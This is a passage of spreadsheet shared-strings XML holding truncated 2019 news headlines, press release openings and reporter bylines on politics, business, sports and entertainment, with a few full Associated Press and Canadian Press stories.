    <t>The global Hemophilia A therapeutics market size is poised to grow by USD 4.31 billion during 2019-2023, according to a new report by...</t>
  </si>
  <si>
    <t>Sen. Martha McSally (R-AZ), who was appointed to the late John McCain’s seat weeks after losing in the general election for the state’s...</t>
  </si>
  <si>
    <t>Jörn Krieger</t>
  </si>
  <si>
    <t>Sports streaming service DAZN has appointed Paul Sexton-Chadwick as SVP Commercial Propositions, helping to drive its strategy and...</t>
  </si>
  <si>
    <t>Isaiahh Loudermilk missed four games last season, the opener while recovering from knee surgery and three because of an ankle injury.</t>
  </si>
  <si>
    <t>Emily Reily</t>
  </si>
  <si>
    <t>Members of Aretha Franklin's family and their representatives remain in a nasty stalemate in a court battle to determine who will get...</t>
  </si>
  <si>
    <t>THE WOODLANDS, Texas, Aug. 7, 2019 /PRNewswire/ -- Huntsman Corporation (NYSE: HUN) announced today it has entered into a definitive...</t>
  </si>
  <si>
    <t>FOCKE STRANGMANN</t>
  </si>
  <si>
    <t>Medianumber 55379178</t>
  </si>
  <si>
    <t>More than a third of patients successfully cured of tuberculosis (TB) have developed permanent lung damage, according to new research. The...</t>
  </si>
  <si>
    <t>DALLAS, Aug. 14, 2019 /PRNewswire/ -- Inc. magazine today revealed that OrderMyGear is an honoree on its annual Inc. 5000 list of the...</t>
  </si>
  <si>
    <t>The NFL preseason slate keeps this week as the Cleveland Browns hit the street to take at the Indianapolis Colts at Lucas Oil Stadium on...</t>
  </si>
  <si>
    <t>Amanda Pedersen</t>
  </si>
  <si>
    <t>Will FDA's latest update on paclitaxel devices trigger a rebound in the utilization of balloons and stents that use the drug?</t>
  </si>
  <si>
    <t>PETRIE, Australia, Aug. 1, 2019 /PRNewswire-PRWeb/ -- "My Complete Diary – Season by Season: Five Aspects of Living" (published by Balboa...</t>
  </si>
  <si>
    <t>By Owen Daugherty</t>
  </si>
  <si>
    <t>McDonald’s says its new eco-friendly paper straws cannot be recycled and instead are being placed in general waste. The fast-food giant...</t>
  </si>
  <si>
    <t>By Jasmine Grant</t>
  </si>
  <si>
    <t>"Now I know exactly where my strength comes from."</t>
  </si>
  <si>
    <t>Recorder News</t>
  </si>
  <si>
    <t>By WINNIE BLACKWOOD Recorder News Staff FONDA — The Montgomery County Legislature reviewed and suggested several cuts for its portion of...</t>
  </si>
  <si>
    <t>Dash Shoppe</t>
  </si>
  <si>
    <t>Dresses are clothes that can be used almost in all events and activities, using a dress will also make you look more elegant and charming....</t>
  </si>
  <si>
    <t>CHICAGO, Aug. 29, 2019 (GLOBE NEWSWIRE) -- Methode Electronics, Inc. (NYSE: MEI), a global developer of custom-engineered and...</t>
  </si>
  <si>
    <t>BERKELEY HEIGHTS, N.J. — President Donald Trump said Saturday that North Korea's Kim Jong Un wants to meet once again to "start negotiations" after joint U.S.-South Korea military exercises end. He also said Kim apologized for the flurry of recent short-range missile tests that has rattled U.S. allies in the region. Trump is tweeting more details from the "beautiful" three-page letter he told reporters on Friday that he'd received from Kim. Trump, who is on vacation at his golf club in New Jersey, said Kim spent much of his letter complaining about "the ridiculous and expensive exercises," which North Korea sees as a threat. He said Kim offered him "a small apology" for the recent tests and assured him "that this testing would stop when the exercises end." North Korea on Saturday fired what appeared to be two short-range ballistic missiles into the sea, according to South Korea's military — the fifth round of launches in less than three weeks. "I look forward to seeing Kim Jong Un in the not too distant future!" Trump wrote. The two leaders have met three times — in Singapore, Hanoi and at the Korean Demilitarized Zone — but critics say Trump has received few concessions in the standoff over North Korea's nuclear weapons program in exchange for the meetings. At their second summit in Vietnam in February, Trump rejected Kim's demand for widespread sanctions relief in exchange for dismantling the North's main nuclear complex, a partial disarmament step. The U.S. and South Korea have scaled down their major military exercises since Trump and Kim's first summit in June 2018. But the North insists even the downsized drills violate agreements between Kim and Trump and compel it to "develop, test and deploy the powerful physical means essential for national defence." When they last met in June of this year, Trump and Kim agreed to resume working-level nuclear talks that have been stalled since February, but there have been no known meetings between the two sides since then. Jill Colvin, The Associated Press</t>
  </si>
  <si>
    <t>BELLEVUE, Wash., Aug. 20, 2019 /PRNewswire/ -- Coinstar, LLC, the leader in self-service coin counting, today announced the installation of...</t>
  </si>
  <si>
    <t>Caleb Maglaya Galaraga, Author, The Power of Speaking Life</t>
  </si>
  <si>
    <t>Bias is developed in numerous ways, but there is an intrinsic one we ought to address</t>
  </si>
  <si>
    <t>Bill Barrow .</t>
  </si>
  <si>
    <t>Democratic presidential candidate Joe Biden said Wednesday that in all his decades in public office, he has never talked to any family...</t>
  </si>
  <si>
    <t>Below are the three companies in the Gas Utilities industry with the lowest forward price to earnings (P/E) ratios. Forward P/E uses...</t>
  </si>
  <si>
    <t>MILTON, N.Y., Aug. 22, 2019 /PRNewswire/ -- Sono-Tek Corporation (OTCQX: SOTK), the leading developer and manufacturer of ultrasonic...</t>
  </si>
  <si>
    <t>by MARK SCOLFORO Associated Press</t>
  </si>
  <si>
    <t>HARRISBURG, Pa. (AP) — Pennsylvania's governor says at least four children from his state were recently separated from their parents by...</t>
  </si>
  <si>
    <t>BETHESDA, Md., Aug. 2, 2019 /PRNewswire/ -- The TECHTOPIA Pavilion at the 2019 National Electrical Contractors Association (NECA)...</t>
  </si>
  <si>
    <t>Authorities in Alaska have released the identities of three people found dead in the icy waters of a glacier-fed lake</t>
  </si>
  <si>
    <t>DigiSphere Marketing, Inc., partners with a national women’s boutique clothing retail franchise. Scout &amp; Molly’s was looking to vet a new...</t>
  </si>
  <si>
    <t>Loading... of 0 Police: Florida man asked Walmart employee for gun that 'would kill 200 people' PORT ST. LUCIE, Fla. - Police in...</t>
  </si>
  <si>
    <t>AUSTIN, Texas, Aug. 15, 2019 /PRNewswire/ -- E.ON announced today its largest single-phase project to date, the 440 megawatt (MW) onshore...</t>
  </si>
  <si>
    <t>Matt Findlay</t>
  </si>
  <si>
    <t>UNDER 7s Orange City's Rickard Whiteley under 7s travelled to Blayney for Millthorpe's gala day, played in foggy conditions. The first game...</t>
  </si>
  <si>
    <t>By John Guerra Tampa Bay Newspapers Correspondent           By John Guerra Tampa Bay Newspapers Correspondent "&gt;</t>
  </si>
  <si>
    <t>Capt. Joseph McGilley was based at the station next to St. Pete-Clearwater International Airport 24 years ago.</t>
  </si>
  <si>
    <t>Aleesha Harris</t>
  </si>
  <si>
    <t>The item we’re loving this week is …</t>
  </si>
  <si>
    <t>Jon Gingerich</t>
  </si>
  <si>
    <t>Tue., Aug. 27, 2019 By Jon Gingerich The South Dakota Board of Regents, the governing board that controls the public higher education...</t>
  </si>
  <si>
    <t>Today SkinTē, the first-ever collagen sparkling tea, debuted its first caffeine-free flavor, Hibiscus Vanilla, to flirt with your taste...</t>
  </si>
  <si>
    <t>OTTAWA — Former justice minister and attorney general Jody Wilson-Raybould said Thursday it is "troubling" to her that Prime Minister Justin Trudeau tried to "discredit" her through submissions made to the ethics commissioner from his lawyer. "I think that is incredibly unfortunate and for me is not the issue," Wilson-Raybould told The Canadian Press in an interview. "The issue is that I did my job and recognized that my job was to uphold the independence of the Public Prosecution Service and uphold the rule of law which I am confident that I did." Wilson-Raybould won a measure of vindication Wednesday when Ethics Commissioner Mario Dion released a scathing report that found Trudeau violated the Conflict of Interest Act by improperly pressuring her to halt the criminal prosecution of Montreal engineering giant SNC-Lavalin. Dion concluded that Trudeau's attempts to influence Wilson-Raybould on the SNC-Lavalin prosecution contravened a provision of the ethics code, which prohibits public office holders from using their position to try to influence a decision that would improperly further the private interests of a third party. The report also summarized a "very detailed brief" from Trudeau's legal counsel, including that the relationship with Wilson-Raybould had becoming "challenging and tense." Wilson-Raybould's "anger at being moved" from the justice minister's portfolio "coloured her perception of prior events," it continued. On Thursday, the prime minister repeated his message that while he accepts both Dion's report and full responsibility for what happened, an apology won't be forthcoming. "I disagree with the ethics commissioner's conclusions, but he is an officer of Parliament doing his job, and I fully accept his report — which means I take full responsibility," Trudeau said. "I'm not going to apologize for standing up for Canadian jobs, because that's my job — to make sure Canadians and communities and pensioners and families across the country are supported, and that's what I will always do." In response, Wilson-Raybould said she already indicated in public testimony that the prime minister could talk to her about jobs. "The continuous discussions around it, without offering any additional information and injecting political considerations, was completely inappropriate and the ethics commissioner stated as such," she said. Trudeau has apologized for "many things," she added, noting she's not sure why he's so reluctant to apologize for what has been laid out by an officer of Parliament as a clear case of wrongdoing. "I think the prime minister had yet another opportunity to show leadership in acknowledging that something went seriously wrong," she said. "It was an opportunity for him to apologize to Canadians for what went wrong, which was very clearly laid out in a report ... from the commissioner." Canadians do deserve an apology, echoed former Liberal cabinet minister Jane Philpott. Philpott, once seen as one of the all-stars in Trudeau's front bench before she resigned her post in protest over the way the SNC-Lavalin affair was handled, expressed hope Thursday the whole sordid matter leads to lasting change in Ottawa. "The whole thing was so unnecessary," she said in a separate interview. "I really hope that something good comes from this, that it does shake up the system and raise Canadians' expectations of politicians to hold themselves to the highest standard." The NDP and Conservatives have both called on Trudeau to say that he's sorry. "Quite clearly, Justin Trudeau still can't tell the difference between right and wrong," Scheer said Thursday from Dieppe, N.B. Liberal MPs were put in a "very, very difficult" position by the party and political staff when forced to defend the actions of the Prime Minister's Office, Philpott added. "I think that is something that should cause them all to think about whose direction they are following and they need to be following in the direction of their constituents." Philpott and Wilson-Raybould were both kicked out of the Liberal caucus in April. Both are running as Independents in the upcoming federal election. Trudeau also said the government intends to follow the recommendations from former Liberal cabinet minister Anne McLellan, whom he enlisted to explore the merits of having the justice minister and the attorney general — the jobs Wilson-Raybould held at the time — under the same cabinet portfolio. McLellan's report recommends keeping the two jobs together, but better educating parliamentarians, cabinet ministers and staff members on how best to consult with federal attorneys general. Foreign Affairs Minister Chrystia Freeland, who held a news conference Thursday in Nova Scotia, was asked whether she believes Trudeau should apologize to Philpott and Wilson-Raybould. The prime minister already gave a "full and clear response," she said, calling his acceptance of responsibility a "really important act of leadership. As for Philpott's re-election campaign, she's not taking anything for granted, noting it's no secret that getting elected as an Independent is not easy. She also said she's certainly "paid a price" for standing up for principles but it is more important to do so than worry about any personal penalty. During canvassing efforts, Philpott said she has heard directly from constituents who thank her "standing up for what's right." The SNC-Lavalin controversy will continue to matter in the context of the campaign, Philpott added. "Canadians care about being able to trust that politicians speak the truth and that they put the interests of Canadians ahead of their own political interests," she said "I do think it will have an impact." —Follow @kkirkup on Twitter Kristy Kirkup, The Canadian Press</t>
  </si>
  <si>
    <t>IPC E-Textiles 2019, a two-day technical education workshop for innovators, technologists and OEMs/brands to learn about the latest...</t>
  </si>
  <si>
    <t>VENICE, Italy (AP) — Documentary filmmaker Alex Gibney says profiling exiled businessman Mikhail Khodorkovsky allowed him to explore power...</t>
  </si>
  <si>
    <t>CrowdStrike® Inc., a leader in cloud-delivered endpoint protection, today announced it has been positioned by Gartner, Inc. in the Leaders...</t>
  </si>
  <si>
    <t>NEW YORK, Aug. 14, 2019 /PRNewswire/ -- Inc. magazine today revealed that Advertise Purple, Inc. is No. 425 on its annual Inc. 5000 list,...</t>
  </si>
  <si>
    <t>Anna Tingley</t>
  </si>
  <si>
    <t>A revealing conversation has emerged between Marlon Brando and Michael Jackson, in which the actor recounts Jackson's reaction to the...</t>
  </si>
  <si>
    <t>For investors, increase in profitability and industry-beating performance can be essential considerations in an investment. Below, I will...</t>
  </si>
  <si>
    <t>by Caroline Schelle</t>
  </si>
  <si>
    <t>A two-year-old girl is recovering in hospital from a dog attack in Melbourne's inner north. The child was attacked at a Rennie Street...</t>
  </si>
  <si>
    <t>Daniel Smith</t>
  </si>
  <si>
    <t>House of Commons is currently expected to resume sitting after its summer break on September 3 In a move which could hamper efforts by MPs...</t>
  </si>
  <si>
    <t>A gauge of equities worldwide rose on Wednesday as data showing strong demand for oil helped subdue recession jitters, while sterling...</t>
  </si>
  <si>
    <t>ANKARA, Turkey (AP) — In a new government crackdown on a pro-Kurdish party, Turkey on Monday removed from office the elected mayors of...</t>
  </si>
  <si>
    <t>newisbetterthanace (Posted by)</t>
  </si>
  <si>
    <t>Microsoft contractors are listening in on Skype calls and recordings from its voice assistant Cortana, a report by Motherboard revealed on...</t>
  </si>
  <si>
    <t>Alison Skilton</t>
  </si>
  <si>
    <t>The Scottish indie Two Rivers Media has appointed Channel 4 alum Lizi Wootton to the position of head of popular factual. Wootton joins...</t>
  </si>
  <si>
    <t>In the highly contested Men’s Skateboard Street competition at U.S. Bank Stadium in downtown Minneapolis, Monster Energy’s Nyjah Huston...</t>
  </si>
  <si>
    <t>Researchers at Washington University School of Medicine in St. Louis who have been trying to determine what puts such children at risk for...</t>
  </si>
  <si>
    <t>STEVENAGE, England, Aug. 20, 2019 /PRNewswire/ -- AKL Research and Development (AKLRD), a company developing an investigational...</t>
  </si>
  <si>
    <t>CHICAGO, Aug. 28, 2019 (GLOBE NEWSWIRE) -- Potbelly Corporation (NASDAQ: PBPB), the iconic neighborhood sandwich shop concept, today...</t>
  </si>
  <si>
    <t>Mastercard today announced its partnership with transportation solutions provider Cubic Transportation Systems, and Miami-Dade County...</t>
  </si>
  <si>
    <t>ST. PAUL, Minn., Aug. 29, 2019 /PRNewswire-PRWeb/ -- MyTana, a manufacturer and distributor of cleaning, maintenance and inspection tools...</t>
  </si>
  <si>
    <t>SOURCE SoftwareReviews SoftwareReviews names Agiloft Service Desk, C2 ATOM, IBM Control Desk, TeamDynamix ITSM, Ivanti IT Service...</t>
  </si>
  <si>
    <t>Toshiba Australia has returned to benefit pre-tax, reporting a modest sum of AU$666,000 for the monetary yr finishing 31 March 2019, an...</t>
  </si>
  <si>
    <t>Martin Shaw;Amardeep Bassey</t>
  </si>
  <si>
    <t>The country's most popular disinfectant has teamed up with parenting vlogger Louise Pentland</t>
  </si>
  <si>
    <t>There's a shocking stage of difficulty in Panache's Ancestors: The Humankind Odyssey. If you move in unprepared, you are going to find it...</t>
  </si>
  <si>
    <t>MEADVILLE, Pa., Aug. 26, 2019 /PRNewswire-PRWeb/ -- "Nehemiah on Leadership: I Can't Come Down" is a helpful exploration into the kind of...</t>
  </si>
  <si>
    <t>Amanda Ferris</t>
  </si>
  <si>
    <t>When making the decision to dorm on campus in college, getting a roommate is all a game of luck and there’s always a chance that the odds...</t>
  </si>
  <si>
    <t>Muay Thai</t>
  </si>
  <si>
    <t>— Darren Till (@darrentill2) August 2, 2019 “No matter what you little shit. Werdum still threw a boomerang at you and you did fuck all....</t>
  </si>
  <si>
    <t>The combination and interoperability of Petro-SIM® and COILSIM1D provides capital efficient design and optimization to petrochemical...</t>
  </si>
  <si>
    <t>James Bonnell                        More from James Bonnell</t>
  </si>
  <si>
    <t>Around 200 special athletes participated in the Challenger Baseball National Jamboree. The participants received training from the Jays...</t>
  </si>
  <si>
    <t>The SPDR S&amp;P Retail ETF (XRT) is lower by 3.51% year-to-date while some ETFs with exposure to online retail are surging, but some traders...</t>
  </si>
  <si>
    <t>SOURCE Grocery Manufacturers Association More than 10% of the U.S. jobs and GDP supported by CPG ARLINGTON, Va., Aug. 6, 2019...</t>
  </si>
  <si>
    <t>, (AP) -- Saul Sanchez hit a run-scoring double in the fifth inning, leading the DSL Athletics to a 4-2 win over the DSL Astros on Tuesday....</t>
  </si>
  <si>
    <t>The "Global AWS Managed Services Market Analysis &amp; Trends - Industry Forecast to 2027" report has been added to ResearchAndMarkets.com's...</t>
  </si>
  <si>
    <t>LITTLE ROCK, Ark. (AP) — A baby raccoon with a brain injury that hinders her mobility is walking again in Arkansas with the help of a...</t>
  </si>
  <si>
    <t>Homes have been evacuated and stranded people rescued as heavy downpours caused flooding across parts of the UK.</t>
  </si>
  <si>
    <t>adwpadmin</t>
  </si>
  <si>
    <t>ALBUQUERQUE, N.M. (AP) — Former University of New Mexico athletic director Paul Krebs has been indicted in connection with a lavish 2015...</t>
  </si>
  <si>
    <t>Justice Ruth Bader Ginsburg has completed radiation therapy for a tumour on her pancreas – and there is no evidence of the disease...</t>
  </si>
  <si>
    <t>Garage Door Service And Repair Inc., a reputed garage door repair Houston TX service provider, recently upgraded their quality of security...</t>
  </si>
  <si>
    <t>NAIROBI — Eritrea is forcing thousands of students and teachers into indefinite national service, driving many into exile and frustrating...</t>
  </si>
  <si>
    <t>PARIS (AP) — French President Emmanuel Macron is calling for a new global economic order, decrying an "unprecedented crisis" in the market...</t>
  </si>
  <si>
    <t>International Flavors &amp; Fragrances, Inc. (NYSE:IFF) International Flavors &amp; Fragrances, Inc. (NYSE:IFF) closed at $113 on the last trading...</t>
  </si>
  <si>
    <t>Yann Magcamit</t>
  </si>
  <si>
    <t>Do not let his heavenly voice fool you – because besides being a main vocalist, Kim Jae Hwan is also “main model” material. Kim Jae Hwan...</t>
  </si>
  <si>
    <t>By Jemma Carr For Mailonline</t>
  </si>
  <si>
    <t>The man elected to be the Cipotegato runs through the streets of Tarazona dressed in a harlequin outfit He represents a local prisoner that...</t>
  </si>
  <si>
    <t>SHCHERBINKA, Russia, Aug. 29, 2019 /PRNewswire/ -- Deputy Prime Minister of Russia Maxim Akimov and the Chairman of Russian Railways (RZD)...</t>
  </si>
  <si>
    <t>HEFEI, China, Aug. 18, 2019 /PRNewswire/ -- Sungrow, the global leading inverter solution supplier for renewables, announced that it was...</t>
  </si>
  <si>
    <t>By Michael Lev Arizona Daily Star</t>
  </si>
  <si>
    <t>Second-year receiver Thomas Marcus Jr. is no longer on the Arizona Wildcats football roster, a school official confirmed. Marcus was...</t>
  </si>
  <si>
    <t>The Global Light Tower Market is estimated to grow at a CAGR of 3.8% over the forecast period as the scope and its applications are rising...</t>
  </si>
  <si>
    <t>SaaS Company that Provides Machine Performance Analytics Oversubscribes Funding Round CHARLOTTE, N.C. - Aug. 14, 2019 - PRLog --...</t>
  </si>
  <si>
    <t>Artemis Moshtaghian</t>
  </si>
  <si>
    <t>A teenage girl traveling through Southern California may have exposed hundreds of people to the measles when she visited several popular...</t>
  </si>
  <si>
    <t>Authored by Boyd Cathey via The Unz Review,</t>
  </si>
  <si>
    <t>DUBLIN, Aug. 29, 2019 /PRNewswire/ -- The "Waste Management Market by Waste Type and Service: Global Opportunity Analysis and Industry...</t>
  </si>
  <si>
    <t>NEW YORK, Aug. 26, 2019 (GLOBE NEWSWIRE) -- New York, N.Y., August 26, 2019. Zhang Investor Law announces the filing of a class action...</t>
  </si>
  <si>
    <t>Dublin, Aug. 27, 2019 (GLOBE NEWSWIRE) -- The "U.S. Pet Market Focus: Pet Specialty Channel and Internet Shoppers" report has been...</t>
  </si>
  <si>
    <t>/PRNewswire/ -- Leading fashion retailer Nordstrom, Inc. announced Teri Bariquit as Chief Merchandising Officer. In this newly created...</t>
  </si>
  <si>
    <t>The Global X MSCI Greece ETF ( GREK C ) , the only ETF dedicated to Greek stocks, is slumping this month, but that may be more a symptom of...</t>
  </si>
  <si>
    <t>Toll Brothers Inc reported a better-than-expected quarterly profit as increased home prices cushioned the luxury homebuilder from higher...</t>
  </si>
  <si>
    <t>Stillcanna Set to Begin Extracting its 2019 Harvest in Q4 VANCOUVER, BC / ACCESSSWIRE / August 12, 2019 / Stillcanna Inc. (OTC PINK:SCNNF)...</t>
  </si>
  <si>
    <t>AFP, New York</t>
  </si>
  <si>
    <t>Roger Federer and Serena Williams, the all-time leaders in Grand Slam titles, cruised into the fourth round of the US Open on Friday while...</t>
  </si>
  <si>
    <t>SOURCE Shefik Shefik has been bestowed with the rank of Knight in the Equestrian Order of Michael Archangel, for his charitable work. The...</t>
  </si>
  <si>
    <t>AUSTIN, Texas, Aug. 26, 2019 /PRNewswire-PRWeb/ -- Mike Robski, a hosting industry veteran with over 25 years of software design and...</t>
  </si>
  <si>
    <t>Christine Flatley</t>
  </si>
  <si>
    <t>A Queensland judge has denied bail to a man accused of running drugs for an international syndicate because his potential hefty jail term...</t>
  </si>
  <si>
    <t>BURLINGAME, Calif.--(BUSINESS WIRE)--Aug 9, 2019--</t>
  </si>
  <si>
    <t>A sadistic and evil church warden is facing life imprisonment after being convicted of murdering a university lecturer following a...</t>
  </si>
  <si>
    <t>DELAWARE COUNTY, Okla. — Delaware County Sheriff's Office deputies have released the name of the victim and the two suspects involved in a...</t>
  </si>
  <si>
    <t>Cedar Attanasio</t>
  </si>
  <si>
    <t>EL PASO, Texas — More than 100 people marched through the Texas border city of El Paso on Saturday, denouncing racism and calling for stronger gun laws one week after 22 people were killed in a mass shooting that authorities say was carried out by a man targeting Mexicans. Chanting "gun reform now," '' El Paso strong" and "aquí estamos y no nos vamos" — Spanish for "here we are and we are not leaving" — the marchers included Hispanic, white and black people dressed in white to symbolize peace and carrying 22 white wooden crosses to represent the victims of the shooting at an El Paso Walmart. The man charged in with capital murder in the attack, 21-year-old Patrick Crusius told investigators he targeted Mexicans at the store with an AK-47 rifle, an El Paso detective said in an arrest affidavit. Federal prosecutors have said they're weighing hate-crime charges. Asurvivorof the shooting, Jessica Coca Garcia, spoke to those gathered at the League of United Latin American Citizens' "March for a United America." "Racism is something I always wanted to think didn't exist. Obviously, it does," Coca Garcia said after rising froma wheelchair. Bandages covered gunshot wounds to her leg. "I love you, El Paso," she said, her voice cracking. "This is where I'm going to stay." Former U.S. Rep. Beto O'Rourke, who is seeking the Democratic presidential nomination, also attended and spoke to the crowed. O'Rourke has blamed President Donald Trump's rhetoric for spreading fear and hate, leading Trump to tweet that O'Rourke should "be quiet."</t>
  </si>
  <si>
    <t>By BRIAN MELLEY and JULIE WATSON Associated Press</t>
  </si>
  <si>
    <t>SAN DIEGO (AP) — The Navy dismissed charges Thursday against an officer accused of covering up war crimes by a SEAL later acquitted of...</t>
  </si>
  <si>
    <t>GENE CHAMBERLAIN Associated Press</t>
  </si>
  <si>
    <t>LAKE FOREST, Ill. (AP) — The Chicago Bears' kicking competition is over for now, with Eddy Pineiro the winner. The Bears announced Sunday...</t>
  </si>
  <si>
    <t>Adam Holmes</t>
  </si>
  <si>
    <t>It may not have been critically well-received, but given the ridiculous amount of money Venom made in theaters, it’s hardly surprising that...</t>
  </si>
  <si>
    <t>CHRIS TALBOTT (Associated Press) The Associated Press</t>
  </si>
  <si>
    <t>SEATTLE (AP) -- Dinelson Lamet took a no-hit bid into the seventh inning for the only major league team that's never pitched one, leading...</t>
  </si>
  <si>
    <t>Equity Residential (NYSE:EQR) – SunTrust Banks boosted their FY2019 earnings per share estimates for Equity Residential in a report...</t>
  </si>
  <si>
    <t>NEW YORK, Oct. 2, 2019 /PRNewswire/ -- Today, CheapOair®, the premier online travel agency and leading provider of affordable flights, has...</t>
  </si>
  <si>
    <t>WASHINGTON (AP) - House investigators say they will issue a subpoena demanding all White House and Trump administration documents related...</t>
  </si>
  <si>
    <t>Summary: A new market study, titled “Discover Global Wireless Audio Market Upcoming Trends, Growth Drivers and Challenges” has been...</t>
  </si>
  <si>
    <t>Several Metro Manila mayors believe they did a good job in clearing roads of obstructions as ordered by the Department of Interior and...</t>
  </si>
  <si>
    <t>9to5Mac</t>
  </si>
  <si>
    <t>Apple is yet again putting its voice and name behind the Deferred Action for Childhood Arrivals, or DACA, policy. The United States Supreme...</t>
  </si>
  <si>
    <t>Dane Haylett-Petty has backed Michael Cheika's approach of chopping and changing at the Rugby World Cup ahead of Australia's final Pool D...</t>
  </si>
  <si>
    <t>SOURCE Beyond Limits "Beyond Conventional AI" company donates $500 for every homer hit over its left-field banner to Astros Foundation and...</t>
  </si>
  <si>
    <t>OTTAWA, Oct. 1, 2019 /CNW/ - The Canada Revenue Agency (CRA) announced today the prescribed annual interest rates that will apply to any...</t>
  </si>
  <si>
    <t>SECI Extends Bid Deadline for 97.5 MW Rooftop Solar Scheme, Again Saurenergy Source: Solar Energy SECI Extends Bid Deadline for 97.5 MW...</t>
  </si>
  <si>
    <t>Boris Johnson and his Cabinet meet today to discuss the hostile reaction from Dublin and Brussels to his new Brexit blueprint which...</t>
  </si>
  <si>
    <t>Police in Ontario have cancelled an Amber Alert for five children who were allegedly abducted by their father a week ago but say the search...</t>
  </si>
  <si>
    <t>Scoop</t>
  </si>
  <si>
    <t>Kate Middleton Duchess of Cambridge with the Prime Minister of Pakistan in Islamabad on October 15 2019 WHAT SHE WORE: Kate wore green coat...</t>
  </si>
  <si>
    <t>Nicole Bosco</t>
  </si>
  <si>
    <t>UFC</t>
  </si>
  <si>
    <t>The NBA has postponed Wednesday's scheduled media sessions in Shanghai for the Brooklyn Nets and Los Angeles Lakers, and it remains unclear...</t>
  </si>
  <si>
    <t>The research shows three factors — a child’s and mother’s Body Mass Index (BMI) and the mother’s education level — predict the onset or...</t>
  </si>
  <si>
    <t>NEW YORK, NY / ACCESSWIRE / October 8, 2019 / The Klein Law Firm announces that class action complaints have been filed on behalf of...</t>
  </si>
  <si>
    <t>By Zach Braziller</t>
  </si>
  <si>
    <t>The Giants were more than doubled-up in total yardage. Their defense was exposed. They couldn’t run the ball or protect the quarterback....</t>
  </si>
  <si>
    <t>Tomo Luetic</t>
  </si>
  <si>
    <t>Your life is for you to tell about it.</t>
  </si>
  <si>
    <t>A no-deal Brexit which led to 10% tariffs on exports would make Nissan’s European business model unsustainable, its chairman has warned....</t>
  </si>
  <si>
    <t>bluelilly (Posted by)</t>
  </si>
  <si>
    <t>A new passenger survey ranks New York's LaGuardia, Newark Liberty International in New Jersey and Honolulu International as the worst...</t>
  </si>
  <si>
    <t>Jess Cohen</t>
  </si>
  <si>
    <t>Calling all Barbie girls! You can now stay at THE Malibu Dreamhouse! That's right, Barbie has become an Airbnb host and is letting guests...</t>
  </si>
  <si>
    <t>NEW YORK (AP) - Two men have been convicted in a federal case featuring the testimony of rapper Tekashi 6ix9ine (teh-KAH'-shee siks-NYN')....</t>
  </si>
  <si>
    <t>CEO Roger Ralston Will Be Discussing A Major Company Announcement and Providing Updates on Business Activity At NASDAQ Interview. NEW...</t>
  </si>
  <si>
    <t>Strictly Come Dancing's David James isn't very happy with the show's judges at the moment, calling some of their comments "clichéd" and...</t>
  </si>
  <si>
    <t>Sheridan Smith has narrated an audiobook edition of one of author Dame Jacqueline Wilson’s stories. The Gavin And Stacey star said it was...</t>
  </si>
  <si>
    <t>LAFAYETTE, Calif., October 03, 2019 /PRNewswire-PRWeb/ -- In some ways, the American healthcare industry looks a lot like the retail...</t>
  </si>
  <si>
    <t>The most traded stock in the segment ‘Other’ currently is NEL ASA (as of 06:01:04 GMT). Today’s trading saw a trading volume of 39,552...</t>
  </si>
  <si>
    <t>-Travel Oregon launches innovative voice search game through Amazon's Alexa device-</t>
  </si>
  <si>
    <t>UW hasn’t allowed a point yet this month, and a third consecutive shutout is possible given how well the defense has been playing....</t>
  </si>
  <si>
    <t>Gold Coast are sticking to their guns with Carlton over Jack Martin as the end of the AFL trade period approaches. The Blues are reluctant...</t>
  </si>
  <si>
    <t>Focus on Customer Service Earns Echo a Place on the Top 3PL Providers List</t>
  </si>
  <si>
    <t>Proton Power Systems Plc (LON:PPS) insider Faiz Francois Nahab sold 385,000 shares of the stock in a transaction that occurred on Friday,...</t>
  </si>
  <si>
    <t>Model Amber Rose has welcomed her second child into the world, and his name is Slash Electric. The American star, who previously dated...</t>
  </si>
  <si>
    <t>The Associated Press Pakistan's foreign ministry says "unprovoked firing" by Indian troops in the disputed region of Kashmir has killed...</t>
  </si>
  <si>
    <t>Alpha and Omega Semiconductor (NASDAQ:AOSL) was downgraded by analysts at ValuEngine from a “sell” rating to a “strong sell” rating in a...</t>
  </si>
  <si>
    <t>Revolution Dating believes that people need to return to love, with help from the pros. Besides connecting one couple at a time, this...</t>
  </si>
  <si>
    <t>The Schall Law Firm, a national shareholder rights litigation firm, announces the filing of a class action lawsuit against MINDBODY, Inc....</t>
  </si>
  <si>
    <t>Here is a river flood update for parts of the Mississippi River. River forecasts include past precipitation and forecast rainfall for the...</t>
  </si>
  <si>
    <t>Tony Bizjak and Sawsan Morrar, The Sacramento Bee</t>
  </si>
  <si>
    <t>SACRAMENTO, Calif. - After classes at Sacramento State University, when others had gone home, Alvin Prasad would spend the night sleeping...</t>
  </si>
  <si>
    <t>WiseGuyReports have announced the addition of a new report titled “2019 Global and Regional Fuel Management System Market Research Report...</t>
  </si>
  <si>
    <t>The Global Technical Illustration Software Market Size to Grow from US$ 3.8 Billion in 2019 to US$ 5.1 Billion by 2024, at a CAGR of 6.2%.</t>
  </si>
  <si>
    <t>After the anticipated impact of Typhoon Hagibis dominated the World Cup headlines, match action resumes on Friday when Australia play...</t>
  </si>
  <si>
    <t>Finbar O'Mallon</t>
  </si>
  <si>
    <t>Queenslanders are set to front a parliamentary committee into the National Disability Insurance Scheme to share their experiences of the...</t>
  </si>
  <si>
    <t>Global “In-Home Display Market” report 2019 to 2025 gives a complete data about size and share of the market at an international level. It...</t>
  </si>
  <si>
    <t>HONOLULU (AP) — An increase in sexually transmitted diseases in Hawaii to the highest numbers reported in decades can be linked to the...</t>
  </si>
  <si>
    <t>By Alice McCool, for CNN</t>
  </si>
  <si>
    <t>CNN — The Ugandan government's plan to reintroduce a bill that could impose the death penalty for homosexuality is being met with defiance...</t>
  </si>
  <si>
    <t>England’s Euro 2020 qualifier against Bulgaria was marred by racist abuse on Monday night. The build-up to the game had been dominated by...</t>
  </si>
  <si>
    <t>Renowned rock drummer Ginger Baker has died at the age of 80. The revered percussionist founded influential band Cream with Eric Clapton,...</t>
  </si>
  <si>
    <t>G2 highlights best software companies across Asia Pacific as it expands regional investment with new Singapore office SINGAPORE, Oct. 7,...</t>
  </si>
  <si>
    <t>GrafTech International Ltd. (NYSE:EAF) plans to host its Third Quarter 2019 Conference Call and Webcast on Thursday, November 7, 2019 at...</t>
  </si>
  <si>
    <t>Natalie Hanson</t>
  </si>
  <si>
    <t>CHICO — A group of Paradise students recently got the opportunity to relive the Donner Party’s trek across Utah’s salt flats in 1846. The...</t>
  </si>
  <si>
